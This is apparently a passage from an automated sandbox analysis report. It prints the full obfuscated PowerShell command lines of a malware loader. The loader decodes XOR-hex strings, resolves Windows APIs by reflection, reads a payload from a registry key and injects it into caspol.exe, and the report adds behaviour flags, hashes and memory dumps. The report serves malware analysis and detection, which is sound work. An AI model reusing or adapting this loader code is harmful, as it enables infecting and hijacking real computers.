ACo4GeBro2In4Bi5Sa5By5Ca9Th2Kl2No2AcCFo3Br0Si1Me7Ar0HjDAf4CoAAl4TrBAf2st4Pu5be0St5Te9Sv5Ca1El2aa2Ph3Tb0Pe1Fo7Un0ReDRe2Al9Ca0DdDRi0LoBFo2In4Un5Th0Ta5bi0Ce5Op0To'ti;Te&Pe(Fo`$keAAnrahmFeeSukHyoPerEnpPessvsvi7Do)Wo Pr`$ViSDiePudFeuPolCaoMouCasAn6To;Se`$BoMRuoBirpogSyeDanImdThubjeAflKaiovgte Ni=ta GlfDekUdpBe Li`$HjABarDamsvetakMeoLirSppprsPasOr5Ab Aa`$AnARorBrmSteUnkReoBerFrpBrsSmsLu6Ce;Ar`$OxSAneAddRauPalDeoPsuWasEs7En Do=se NaHPaTnoBDe Un'Ug5BrDHa2BjDDo1BeCUk0SeBDi1Ko4Eu1Lo0Be1Ag7St1Ti8Ep1Si5kr1Ge2Pl1Dr7Ol0AfCLo1FaDFi1TrCKr0ReBSt0PrANu4TvAFi5Ju9ov4ja4Bi5Ti9Ek5SiDDo0FoBHa1Ci1do1Sc8Af0TrDCo1Sk8He1Fo7Pa1De0Me1QuCLi0PiAAn5Be7Ka3bj0Cy1Un7Sa0CaFMu1Ho6St1Bl2Ek1NoCSl5Me1Br2De2Po3In0Mo1To7My0QuDBa2Fe9St0OpDCa0ChBCo2ts4Af4Mu3Kr4Be3St2ta3Se1CoCTu0PaBAn1Rh6Bu5No5Un5Al9Pt4LoAOu4QuCGr4DuFfe5Mo5Am5Me9El4tr9Fu0bi1Re4DiAWi4Fo9Ne4Su9Ex4Me9Pe5Bi5Ha5Pu9Fu4Su9Sa0ce1Sm4MiDAx4Su9Ar5Un0Kr'Af;vi&Ca(Sp`$ToAGurSumInevakKvoDdrUlpFrsTrsBr7Be)Sa Co`$ChSDieDrdRiuAalPloNeuLista7Be;Qu`$QuSSueRedSpuPilOpoFiuArsWa8Ri Ma=Un IvHWhTTiBro 
Ga'br5PeDUn3Om4To1Ba8Fo1Au7Aq1TrDgu1Im1Im1Ty8Br1AnFSh0LaDar1fy0Ha1buESt1CoCDe0HeABu5La9Wr4Af4Sp5Fl9Un5DiDBy0HyBMe1Sh1Ar1De8Bi0LoDRa1Th8Fu1De7Ln1De0St1FrCSn0ReAFi5We7Ef3In0Ch1Dr7Ov0KoFqu1Be6Be1Fo2Be1inCFo5Sa1Va2Al2Hy3Sc0Sh1Ga7Be0TrDCo2Tl9Kn0MiDLu0NuBFa2Un4Hu4In3Ni4An3Za2Be3Ou1FoCSu0SkBEl1Se6Ra5Fo5Au5To9Ot4Ka9Be0Ne1Sc4co8Un4Dr9ut4Va9Ma4va9sa4Un9ku4Re9Va5Am5Fo5Ry9Ja4hi9Ar0Id1Ba4HaAFo4Le9Hy4Un9Af4Ho9Su5Re5Re5Na9De4Op9Di0sh1Ob4StDkl5Fo0Io'Ky;Fo&Va(Hu`$SaAChrAmmGteypkCroVarUkpInsHysBy7Do)Ma Af`$DuSBaeAmdBeuBrlInoSuuStsRa8Pr;fi`$ReASksBrkbaeRstRorResRe=La(MiGbreDotSe-TiISutReeMamZaPUnrCioBapPeeAlrFotUnyRe aa-QuPUtaFrtInhRe De'VoHFjKHuCBiUCo:Pe\viSEsaBunAndFivPaiAagMabSioLueTanUn\ImNNeeFopCotAnuWhnAkiTiadunSk'La)Su.MiPUnlVraJoyFepGaeDinInsSk;Ja`$GrSHaePidUnuFalHyoFuuTjsAk9St Fl=De DeHTmTErBLe Ub'Aa5LaDca2DeAra1AgCEx1RaDDi0inCSe1Kv5Co1Pa6Ud0BeCde0SkAAf5Un9Re4Ec4Ca5Su9he2Mo2Bu2UdATi0Bi0Pe0ReAOf0TrDEa1KaCSy1Ad4Mo5Fy7Va3TrARu1Sp6Ba1Dg7Up0PrFTa1ToCTj0phBJu0FoDar2Dr4sp4Do3Su4Re3St3LaFGe0GrBBi1Ta6pa1Se4Dy3SaBKl1Mu8Sg0MaAAb1KeCug4UnFCo4LnDSi2AuACh0DoDtr0GeBSt1Fi0Co1Us7Oc1ThEne5ti1Ea5enDCa3An8Hy0MiAVa1Sk2Un1SkCMu0ArDTr0NdBSo0SeATh5Ki0Fi'Ls;Di&Co(At`$StAMyrRamTyemakKooMarorpPasAfsGe7Hj)ti Di`$PaSNeeLedMouUdlPuoAruDasBe9th;Ej`$VeAPisApkCaeEjtNorEnsSc0Ka Ko=Sa ErHBuTElBRa so'Ti2In2Cr2PaASu0Ci0Me0ReAKl0unDEj1OvCCa1Fa4In5Fl7Im2MiBSp0MoCde1Sy7Go0GeDSa1Fu0Pi1Po4Ku1PaCGl5Mr7Bo3Se0Ke1Sl7Sp0CoDBe1SyCRe0SoBPr1Kl6He0Fr9Sm2unASe1sjCKr0FoBSu0UaFIn1Fo0Be1UnAMn1AnCIs0UnAKo5Un7In3Fl4Ei1Sm8De0StBIk0BlAPt1An1Kl1Kk8No1Be5Ro2Ch4En4Su3Fl4Dy3De3MiAEn1Kr6Li0Kl9Ve0Un0Hv5Fi1Ti5WhDBr2EnADo1CaCIn1TrDTe0MoCau1Fl5In1Hi6Ny0EfCCa0FdAGa5Bl5Bl5Ho9Pr4Sk9Eg5In5Po5Er9Te5Sl9Od5InDGa2PoDSi1McCUp0ReBUn1Si4Ru1Ak0Ha1Bo7Dr1Fn8Br1Ej5Sa1St2da1Jo7Mi0isCSo1KaDin1KiCTi0MoBSk0CyADy4UnAHo5Ho5Tv5Fu9Pl4PsARe4UnCFi4FoFFu5Sj0Bo'Be;Sa&St(Da`$DeAMorFrmtieUmkGroBrrCapBasDosRe7Zl)un 
Kl`$SnADisAnkEmeEktBerEdsBe0Hv;Du`$EnkFaoAbrJotLgeWrgLeeOprKanSpeSp=Ar`$EtSEneAedAfuAglNeoSpuVasPs.RecleoMeuFrnKotTr-Fe3pr5Bo6En;Se`$BeABasStkSaeIntInravsBr1pr De=Pr UpHHeTKoBha Un'Sl2Ve2br2RdASa0Ta0Wa0VaAOs0PoDAl1SpCDe1Sa4Be5So7Li2IdBMu0PtCBa1Ud7Sp0PaDAl1No0Bu1Cl4No1BrCGr5Ti7La3Co0Te1La7Pa0XiDFo1FlCOp0FuBMi1In6Kk0Af9Pe2InACo1TiCEx0LaBSu0daFra1Bl0Gu1BaAco1WiCMe0AvASq5Un7Il3Fu4Sk1bj8Un0TrBUd0TuAUp1Gu1Sa1Fa8Pr1Ho5Up2Pr4Sp4Le3Ri4ir3Fo3SpAMo1Sl6vi0Ar9Di0Co0He5Un1Ma5ShDIm2ShAJo1TuCSu1VgDKm0FrCfo1Ud5re1At6Do0SwCFo0MaAJa5De5Re5do9Mo4ElAPr4FrCsj4NiFDi5Ki5Ma5Pa9Ba5UdDil3Di4Ar1be8Pr1Me7Sa1ApDVe1Wa1Jv1my8Pr1GaFPr0PaDSp1Wh0Go1foEKr1MoCTa0KiARa5Po5Ci5Ma9or5BlDHy1En2Ny1Op6Ve0CeBSp0HaDSa1UnCBa1ExEsi1AmCAf0FaBHa1Ca7Fr1foCTr5Be0Ad'Dr;Ne&Ad(in`$AnATrrAlmDeeUnkFloLerPapFjsSisUn7In)Ba Ce`$UnAExsDykCeeditOmrCassu1Di;Le`$PaATrsPekMaeKatDurAnsPe2Dr Re=Na chHOpTSuBUn Be'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'La;Am&Me(yd`$SpAchrGgmBnePakReoEirGupAfsBesGa7Di)No Va`$FaAResBrkDeeSutSirAdsOf2In;Km`$AlABosBrkGeeChtWirSysla3Sc Ba=Sm miHBlTreBOp An'Fo5DiDSl2DoCIm1teDBr0PrAEt0UnDSt1ov0Om1VeEAr1Pe7Pr1Mo0Sy1Ci7Cl1UnEPi0RiAFa5Ag7fr3Li0Er1Un7Gi0PaFNa1Ak6Ev1Ba2Ka1UnCDo5Bi1De5beDBi3An4br1St8Ta1Br7En1BeDFi1Bi1By1Fi8Wi1HoFBu0AaDDe1Er0Bl1AfEAn1SkCCo0CyAPr5Ob5Re5KnDHa3Qu4Ud1Vi6Be0PiBHe1SkESt1SyCId1Aw7Pr1BaDUk0EsCSl1StCUn1In5Da1Co0Di1MiEKe5Un0Sk'Ko;To&Un(ty`$SoAQurPimByeMbkVaoBlrElpWhsMosUg7di)an Le`$BeASasFakUaeMutCarStsSn3Kp#Pa;""";Function Asketrs9 { param([String]$Galdebrrene); For($Jeunes=2; $Jeunes -lt $Galdebrrene.Length-1; $Jeunes+=(2+1)){ $Privatudgiften = $Privatudgiften + $Galdebrrene.Substring($Jeunes, 1); } $Privatudgiften;}$synoecete0 = Asketrs9 'KlIBaEInXRa ';$synoecete1= Asketrs9 $Acopyrin;if([IntPtr]::size -eq 8){START-job { param($Kunstkendernes) powershell $Kunstkendernes } -RunAs32 -Argument $synoecete1 | wait-job | Receive-Job;}else{&$synoecete0 $synoecete1;};;;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
[3] \??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
    Command line: "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -s -NoLogo -NoProfile
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Galdebrrene); $Tilstedevrendes = New-Object byte[] ($Galdebrrene.Length / 2); For($Jeunes=0; $Jeunes -lt $Galdebrrene.Length; $Jeunes+=2){ $Tilstedevrendes[$Jeunes/2] = [convert]::ToByte($Galdebrrene.Substring($Jeunes, 2), 16); $Tilstedevrendes[$Jeunes/2] = ($Tilstedevrendes[$Jeunes/2] -bxor 121); } [String][System.Text.Encoding]::ASCII.GetString($Tilstedevrendes);}$Quar0=HTB '2A000A0D1C14571D1515';$Quar1=HTB '34101A0B160A161F0D572E10174A4B572C170A181F1C37180D100F1C341C0D11161D0A';$Quar2=HTB '3E1C0D290B161A381D1D0B1C0A0A';$Quar3=HTB '2A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A573118171D151C2B1C1F';$Quar4=HTB '0A0D0B10171E';$Quar5=HTB '3E1C0D34161D0C151C3118171D151C';$Quar6=HTB '2B2D2A091C1A1018153718141C555931101D1C3B002A101E5559290C1B15101A';$Quar7=HTB '2B0C170D10141C5559341817181E1C1D';$Quar8=HTB '2B1C1F151C1A0D1C1D3D1C151C1E180D1C';$Quar9=HTB '3017341C14160B0034161D0C151C';$Armekorpss0=HTB '34003D1C151C1E180D1C2D00091C';$Armekorpss1=HTB '3A15180A0A5559290C1B15101A55592A1C18151C1D555938170A103A15180A0A5559380C0D163A15180A0A';$Armekorpss2=HTB '30170F16121C';$Armekorpss3=HTB '290C1B15101A555931101D1C3B002A101E5559371C0E2A15160D55592F100B0D0C1815';$Armekorpss4=HTB '2F100B0D0C1815381515161A';$Armekorpss5=HTB '170D1D1515';$Armekorpss6=HTB '370D290B160D1C1A0D2F100B0D0C1815341C14160B00';$Armekorpss7=HTB '303C21';$Armekorpss8=HTB '25';function fkp {Param ($Vitalise118, $Khatri38) ;$Sedulous0 =HTB '5D1B16171D1C1F18171E1C0D59445951223809093D16141810172443433A0C0B0B1C170D3D1614181017573E1C0D380A0A1C141B15101C0A51505905592E111C0B1C54361B131C1A0D5902595D26573E15161B1815380A0A1C141B15003A181A111C595438171D595D265735161A180D101617572A0915100D515D380B141C12160B090A0A415022544824573C080C18150A515D280C180B4950590450573E1C0D2D00091C515D280C180B4850';&($Armekorpss7) $Sedulous0;$Sedulous5 = HTB 
'5D321C0D1A110C09091C170A5944595D1B16171D1C1F18171E1C0D573E1C0D341C0D11161D515D280C180B4B5559222D00091C2224245939515D280C180B4A55595D280C180B4D5050';&($Armekorpss7) $Sedulous5;$Sedulous1 = HTB '0B1C0D0C0B17595D321C0D1A110C09091C170A5730170F16121C515D170C151555593951222A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A573118171D151C2B1C1F2451371C0E54361B131C1A0D592A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A573118171D151C2B1C1F5151371C0E54361B131C1A0D5930170D290D0B505559515D1B16171D1C1F18171E1C0D573E1C0D341C0D11161D515D280C180B4C50505730170F16121C515D170C1515555939515D2F100D1815100A1C4848415050505055595D3211180D0B104A415050';&($Armekorpss7) $Sedulous1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Cigaretters,[Parameter(Position = 1)] [Type] $Overcool = [Void]);$Sedulous2 = HTB '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';&($Armekorpss7) $Sedulous2;$Sedulous3 = HTB '5D2A0C091C0B1F160A1F180D1C0B171C573D1C1F10171C3A16170A0D0B0C1A0D160B515D280C180B4F5559222A000A0D1C14572B1C1F151C1A0D101617573A18151510171E3A16170F1C170D1016170A2443432A0D18171D180B1D55595D3A101E180B1C0D0D1C0B0A50572A1C0D301409151C141C170D180D1016173F15181E0A515D280C180B4E50';&($Armekorpss7) $Sedulous3;$Sedulous4 = HTB '5D2A0C091C0B1F160A1F180D1C0B171C573D1C1F10171C341C0D11161D515D380B141C12160B090A0A4B55595D380B141C12160B090A0A4A55595D360F1C0B1A16161555595D3A101E180B1C0D0D1C0B0A50572A1C0D301409151C141C170D180D1016173F15181E0A515D280C180B4E50';&($Armekorpss7) $Sedulous4;$Sedulous5 = HTB '0B1C0D0C0B17595D2A0C091C0B1F160A1F180D1C0B171C573A0B1C180D1C2D00091C5150';&($Armekorpss7) $Sedulous5 ;}$Recessioner = HTB '121C0B171C154A4B';$Sedulous6 = HTB 
'5D0B11180D1817101C0A594459222A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A5734180B0A1118152443433E1C0D3D1C151C1E180D1C3F160B3F0C171A0D101617291610170D1C0B51511F1209595D2B1C1A1C0A0A1016171C0B595D380B141C12160B090A0A4D505559513E3D2D5939512230170D290D0B245559222C30170D4A4B245559222C30170D4A4B245559222C30170D4A4B245059512230170D290D0B24505050';&($Armekorpss7) $Sedulous6;$Morgenduelig = fkp $Armekorpss5 $Armekorpss6;$Sedulous7 = HTB '5D2D1C0B141017181512170C1D1C0B0A4A5944595D0B11180D1817101C0A5730170F16121C512230170D290D0B244343231C0B1655594A4C4F555949014A494949555949014D4950';&($Armekorpss7) $Sedulous7;$Sedulous8 = HTB '5D3418171D11181F0D101E1C0A5944595D0B11180D1817101C0A5730170F16121C512230170D290D0B244343231C0B1655594901484949494949555949014A494949555949014D50';&($Armekorpss7) $Sedulous8;$Asketrs=(Get-ItemProperty -Path 'HKCU:\Sandvigboen\Neptunian').Playpens;$Sedulous9 = HTB '5D2A1C1D0C15160C0A594459222A000A0D1C14573A16170F1C0B0D2443433F0B16143B180A1C4F4D2A0D0B10171E515D380A121C0D0B0A50';&($Armekorpss7) $Sedulous9;$Asketrs0 = HTB '222A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A5734180B0A1118152443433A160900515D2A1C1D0C15160C0A5559495559595D2D1C0B141017181512170C1D1C0B0A4A55594A4C4F50';&($Armekorpss7) $Asketrs0;$kortegerne=$Sedulous.count-356;$Asketrs1 = HTB '222A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A5734180B0A1118152443433A160900515D2A1C1D0C15160C0A55594A4C4F55595D3418171D11181F0D101E1C0A55595D12160B0D1C1E1C0B171C50';&($Armekorpss7) $Asketrs1;$Asketrs2 = HTB '5D2C1D0A0D101E1710171E0A594459222A000A0D1C14572B0C170D10141C5730170D1C0B16092A1C0B0F101A1C0A5734180B0A1118152443433E1C0D3D1C151C1E180D1C3F160B3F0C171A0D101617291610170D1C0B515D2D1C0B141017181512170C1D1C0B0A4A5559513E3D2D5939512230170D290D0B24552230170D290D0B24505951222F16101D24505050';&($Armekorpss7) $Asketrs2;$Asketrs3 = HTB '5D2C1D0A0D101E1710171E0A5730170F16121C515D3418171D11181F0D101E1C0A555D34160B1E1C171D0C1C15101E50';&($Armekorpss7) $Asketrs3#"4⤵
- Checks QEMU agent file
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
[5] C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
    Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  Filesize: 7KB
  MD5: 15ed2b74285efcadc4b092d7529f4d98
  SHA1: a9ec29d4d0c1d1d3aee379071c733eb1bb144dfa
  SHA256: bf121dbc7d8293d491edbf6fab7e6dfee3572c0fab1b62affc88cb5aae5ec56b
  SHA512: d0c70b23ce7dbf0a6c039304b81bdde95259278b4a9219058d83cb36c00f377e00dae72e7d6863f246e696906e6f4cd7439964bcc40fbfbd2ce14db8fc4bb586
Memory dumps:
  dump                                                            filesize
  memory/860-74-0x0000000005C30000-0x0000000005D30000-memory.dmp   1024KB
  memory/860-68-0x00000000739D0000-0x0000000073F7B000-memory.dmp   5.7MB
  memory/860-70-0x0000000005C30000-0x0000000005D30000-memory.dmp   1024KB
  memory/860-83-0x0000000077AC0000-0x0000000077C40000-memory.dmp   1.5MB
  memory/860-82-0x0000000077AC0000-0x0000000077C40000-memory.dmp   1.5MB
  memory/860-79-0x0000000077AC0000-0x0000000077C40000-memory.dmp   1.5MB
  memory/860-77-0x0000000077AC0000-0x0000000077C40000-memory.dmp   1.5MB
  memory/860-76-0x00000000778E0000-0x0000000077A89000-memory.dmp   1.7MB
  memory/860-73-0x00000000739D0000-0x0000000073F7B000-memory.dmp   5.7MB
  memory/860-65-0x0000000000000000-mapping.dmp
  memory/988-63-0x00000000762B1000-0x00000000762B3000-memory.dmp   8KB
  memory/988-72-0x00000000739D0000-0x0000000073F7B000-memory.dmp   5.7MB
  memory/988-62-0x0000000000000000-mapping.dmp
  memory/988-64-0x00000000739D0000-0x0000000073F7B000-memory.dmp   5.7MB
  memory/1200-61-0x00000000027AB000-0x00000000027CA000-memory.dmp  124KB
  memory/1200-58-0x000007FEF3280000-0x000007FEF3DDD000-memory.dmp  11.4MB
  memory/1200-59-0x00000000027A4000-0x00000000027A7000-memory.dmp  12KB
  memory/1200-57-0x000007FEF3DE0000-0x000007FEF4803000-memory.dmp  10.1MB
  memory/1200-55-0x0000000000000000-mapping.dmp
  memory/1200-60-0x000000001B750000-0x000000001BA4F000-memory.dmp  3.0MB
  memory/1200-71-0x00000000027AB000-0x00000000027CA000-memory.dmp  124KB
  memory/1200-69-0x00000000027A4000-0x00000000027A7000-memory.dmp  12KB
  memory/1876-84-0x0000000000100000-0x0000000000200000-memory.dmp  1024KB
  memory/1876-80-0x00000000008D768E-mapping.dmp
  memory/1876-81-0x0000000000100000-0x0000000000200000-memory.dmp  1024KB
  memory/1928-54-0x000007FEFC161000-0x000007FEFC163000-memory.dmp  8KB